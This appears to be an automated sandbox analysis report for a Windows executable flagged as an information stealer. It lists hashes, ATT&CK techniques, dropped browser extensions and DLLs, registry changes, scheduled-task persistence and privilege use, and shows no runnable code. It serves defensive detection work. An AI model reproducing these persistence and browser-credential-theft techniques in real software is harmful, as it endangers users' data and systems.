fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7

Analysis

max time kernel
121s
max time network
125s
platform
windows10_x64
resource
win10-en-20211014
submitted
07-12-2021 13:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7.exe
Size

7.2MB
MD5

57a56615ff17551110947d9e9ef68c1b
SHA1

00af278440d5708e9ac182cbd3a7d134b2ff9be1
SHA256

fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7
SHA512

65b8151e5790c9d387218aa7bb1d644c77d3058e1e4d7ad7cf43e1a8ec29c6e7bf241e6091031312debd8bfcf06987a77b581a135041e48f6f86a0bb0a15d5ed

Score

8^/10

discovery spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

44 608 rundll32.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exeiTpjBjb.exeYIcBoOh.exe

pid process

1904 Install.exe
596 Install.exe
2188 iTpjBjb.exe
1084 YIcBoOh.exe

flow	pid	process
44	608	rundll32.exe

pid	process
1904	Install.exe
596	Install.exe
2188	iTpjBjb.exe
1084	YIcBoOh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

YIcBoOh.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation YIcBoOh.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

608 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	YIcBoOh.exe

pid	process
608	rundll32.exe

Drops Chrome extension 2 IoCs

Processes:

YIcBoOh.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	YIcBoOh.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json	YIcBoOh.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

YIcBoOh.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini YIcBoOh.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	YIcBoOh.exe

Drops file in System32 directory 39 IoCs

Processes:

YIcBoOh.exepowershell.exeiTpjBjb.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8EAD839742BB2FF451ED22B38BE323CE	YIcBoOh.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	iTpjBjb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_68449E40D6F23F8A5B26E120F6AB763F	YIcBoOh.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	YIcBoOh.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	YIcBoOh.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_236E243F97CD352248042AF77144B4DB	YIcBoOh.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	iTpjBjb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8EAD839742BB2FF451ED22B38BE323CE	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_236E243F97CD352248042AF77144B4DB	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_68449E40D6F23F8A5B26E120F6AB763F	YIcBoOh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe

Drops file in Program Files directory 14 IoCs

Processes:

YIcBoOh.exe

description	ioc	process
File created	C:\Program Files (x86)\uOxyKSRzU\HEFwJl.dll	YIcBoOh.exe
File created	C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR\JwQELSZ.xml	YIcBoOh.exe
File created	C:\Program Files (x86)\iwPzvUpjWnASC\smMoVtg.dll	YIcBoOh.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	YIcBoOh.exe
File created	C:\Program Files (x86)\XiSQzoDDNriU2\ryMTXPM.xml	YIcBoOh.exe
File created	C:\Program Files (x86)\iwPzvUpjWnASC\YsthQLr.xml	YIcBoOh.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	YIcBoOh.exe
File created	C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR\rnpIUHH.dll	YIcBoOh.exe
File created	C:\Program Files (x86)\LlsUhQdDHwUn\niYJcEL.dll	YIcBoOh.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	YIcBoOh.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	YIcBoOh.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	YIcBoOh.exe
File created	C:\Program Files (x86)\uOxyKSRzU\kVzzyHe.xml	YIcBoOh.exe
File created	C:\Program Files (x86)\XiSQzoDDNriU2\BHuEHFawTJIlF.dll	YIcBoOh.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bUbwOjBFLYdfVuOzuH.job	schtasks.exe
File created	C:\Windows\Tasks\rAGvRcSmKNmXDYhyc.job	schtasks.exe
File created	C:\Windows\Tasks\otWutwTqMGFqoHm.job	schtasks.exe
File created	C:\Windows\Tasks\kdhWAIqXLMPgJoPbW.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1964	schtasks.exe
440	schtasks.exe
4048	schtasks.exe
3188	schtasks.exe
1708	schtasks.exe
3580	schtasks.exe
404	schtasks.exe
2936	schtasks.exe
512	schtasks.exe
420	schtasks.exe
3940	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.exeYIcBoOh.exepowershell.exepowershell.exeiTpjBjb.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	YIcBoOh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	YIcBoOh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume	YIcBoOh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	iTpjBjb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	iTpjBjb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	YIcBoOh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	YIcBoOh.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeYIcBoOh.exepowershell.exe

pid	process
1476	powershell.exe
1476	powershell.exe
1476	powershell.exe
2388	powershell.exe
2388	powershell.exe
2388	powershell.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
1368	powershell.exe
1368	powershell.exe
1368	powershell.exe
1784	powershell.EXE
1784	powershell.EXE
1784	powershell.EXE
2308	powershell.exe
2308	powershell.exe
2308	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
3660	powershell.exe
3660	powershell.exe
3660	powershell.exe
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
956	powershell.exe
956	powershell.exe
956	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
848	powershell.EXE
848	powershell.EXE
848	powershell.EXE
704	powershell.exe
704	powershell.exe
704	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
3212	powershell.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe
3212	powershell.exe
3212	powershell.exe
1936	powershell.exe
1936	powershell.exe
1936	powershell.exe
1084	YIcBoOh.exe
1084	YIcBoOh.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeIncreaseQuotaPrivilege	1528	WMIC.exe
Token: SeSecurityPrivilege	1528	WMIC.exe
Token: SeTakeOwnershipPrivilege	1528	WMIC.exe
Token: SeLoadDriverPrivilege	1528	WMIC.exe
Token: SeSystemProfilePrivilege	1528	WMIC.exe
Token: SeSystemtimePrivilege	1528	WMIC.exe
Token: SeProfSingleProcessPrivilege	1528	WMIC.exe
Token: SeIncBasePriorityPrivilege	1528	WMIC.exe
Token: SeCreatePagefilePrivilege	1528	WMIC.exe
Token: SeBackupPrivilege	1528	WMIC.exe
Token: SeRestorePrivilege	1528	WMIC.exe
Token: SeShutdownPrivilege	1528	WMIC.exe
Token: SeDebugPrivilege	1528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1528	WMIC.exe
Token: SeRemoteShutdownPrivilege	1528	WMIC.exe
Token: SeUndockPrivilege	1528	WMIC.exe
Token: SeManageVolumePrivilege	1528	WMIC.exe
Token: 33	1528	WMIC.exe
Token: 34	1528	WMIC.exe
Token: 35	1528	WMIC.exe
Token: 36	1528	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1528	WMIC.exe
Token: SeSecurityPrivilege	1528	WMIC.exe
Token: SeTakeOwnershipPrivilege	1528	WMIC.exe
Token: SeLoadDriverPrivilege	1528	WMIC.exe
Token: SeSystemProfilePrivilege	1528	WMIC.exe
Token: SeSystemtimePrivilege	1528	WMIC.exe
Token: SeProfSingleProcessPrivilege	1528	WMIC.exe
Token: SeIncBasePriorityPrivilege	1528	WMIC.exe
Token: SeCreatePagefilePrivilege	1528	WMIC.exe
Token: SeBackupPrivilege	1528	WMIC.exe
Token: SeRestorePrivilege	1528	WMIC.exe
Token: SeShutdownPrivilege	1528	WMIC.exe
Token: SeDebugPrivilege	1528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1528	WMIC.exe
Token: SeRemoteShutdownPrivilege	1528	WMIC.exe
Token: SeUndockPrivilege	1528	WMIC.exe
Token: SeManageVolumePrivilege	1528	WMIC.exe
Token: 33	1528	WMIC.exe
Token: 34	1528	WMIC.exe
Token: 35	1528	WMIC.exe
Token: 36	1528	WMIC.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeIncreaseQuotaPrivilege	1912	WMIC.exe
Token: SeSecurityPrivilege	1912	WMIC.exe
Token: SeTakeOwnershipPrivilege	1912	WMIC.exe
Token: SeLoadDriverPrivilege	1912	WMIC.exe
Token: SeSystemProfilePrivilege	1912	WMIC.exe
Token: SeSystemtimePrivilege	1912	WMIC.exe
Token: SeProfSingleProcessPrivilege	1912	WMIC.exe
Token: SeIncBasePriorityPrivilege	1912	WMIC.exe
Token: SeCreatePagefilePrivilege	1912	WMIC.exe
Token: SeBackupPrivilege	1912	WMIC.exe
Token: SeRestorePrivilege	1912	WMIC.exe
Token: SeShutdownPrivilege	1912	WMIC.exe
Token: SeDebugPrivilege	1912	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1912	WMIC.exe
Token: SeRemoteShutdownPrivilege	1912	WMIC.exe
Token: SeUndockPrivilege	1912	WMIC.exe
Token: SeManageVolumePrivilege	1912	WMIC.exe
Token: 33	1912	WMIC.exe
Token: 34	1912	WMIC.exe
Token: 35	1912	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7.exeInstall.exeInstall.execmd.exeforfiles.execmd.exeforfiles.exeforfiles.execmd.execmd.exepowershell.exeforfiles.execmd.exepowershell.exeforfiles.exe

description	pid	process	target process
PID 2696 wrote to memory of 1904	2696	fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7.exe	Install.exe
PID 2696 wrote to memory of 1904	2696	fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7.exe	Install.exe
PID 2696 wrote to memory of 1904	2696	fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7.exe	Install.exe
PID 1904 wrote to memory of 596	1904	Install.exe	Install.exe
PID 1904 wrote to memory of 596	1904	Install.exe	Install.exe
PID 1904 wrote to memory of 596	1904	Install.exe	Install.exe
PID 596 wrote to memory of 1212	596	Install.exe	cmd.exe
PID 596 wrote to memory of 1212	596	Install.exe	cmd.exe
PID 596 wrote to memory of 1212	596	Install.exe	cmd.exe
PID 1212 wrote to memory of 1320	1212	cmd.exe	forfiles.exe
PID 1212 wrote to memory of 1320	1212	cmd.exe	forfiles.exe
PID 1212 wrote to memory of 1320	1212	cmd.exe	forfiles.exe
PID 1320 wrote to memory of 2292	1320	forfiles.exe	cmd.exe
PID 1320 wrote to memory of 2292	1320	forfiles.exe	cmd.exe
PID 1320 wrote to memory of 2292	1320	forfiles.exe	cmd.exe
PID 2292 wrote to memory of 1476	2292	cmd.exe	powershell.exe
PID 2292 wrote to memory of 1476	2292	cmd.exe	powershell.exe
PID 2292 wrote to memory of 1476	2292	cmd.exe	powershell.exe
PID 596 wrote to memory of 3640	596	Install.exe	forfiles.exe
PID 596 wrote to memory of 3640	596	Install.exe	forfiles.exe
PID 596 wrote to memory of 3640	596	Install.exe	forfiles.exe
PID 596 wrote to memory of 504	596	Install.exe	forfiles.exe
PID 596 wrote to memory of 504	596	Install.exe	forfiles.exe
PID 596 wrote to memory of 504	596	Install.exe	forfiles.exe
PID 3640 wrote to memory of 2408	3640	forfiles.exe	cmd.exe
PID 3640 wrote to memory of 2408	3640	forfiles.exe	cmd.exe
PID 3640 wrote to memory of 2408	3640	forfiles.exe	cmd.exe
PID 504 wrote to memory of 840	504	forfiles.exe	cmd.exe
PID 504 wrote to memory of 840	504	forfiles.exe	cmd.exe
PID 504 wrote to memory of 840	504	forfiles.exe	cmd.exe
PID 2408 wrote to memory of 1028	2408	cmd.exe	reg.exe
PID 2408 wrote to memory of 1028	2408	cmd.exe	reg.exe
PID 2408 wrote to memory of 1028	2408	cmd.exe	reg.exe
PID 840 wrote to memory of 920	840	cmd.exe	reg.exe
PID 840 wrote to memory of 920	840	cmd.exe	reg.exe
PID 840 wrote to memory of 920	840	cmd.exe	reg.exe
PID 840 wrote to memory of 1168	840	cmd.exe	reg.exe
PID 840 wrote to memory of 1168	840	cmd.exe	reg.exe
PID 840 wrote to memory of 1168	840	cmd.exe	reg.exe
PID 2408 wrote to memory of 2644	2408	cmd.exe	reg.exe
PID 2408 wrote to memory of 2644	2408	cmd.exe	reg.exe
PID 2408 wrote to memory of 2644	2408	cmd.exe	reg.exe
PID 1476 wrote to memory of 1528	1476	powershell.exe	WMIC.exe
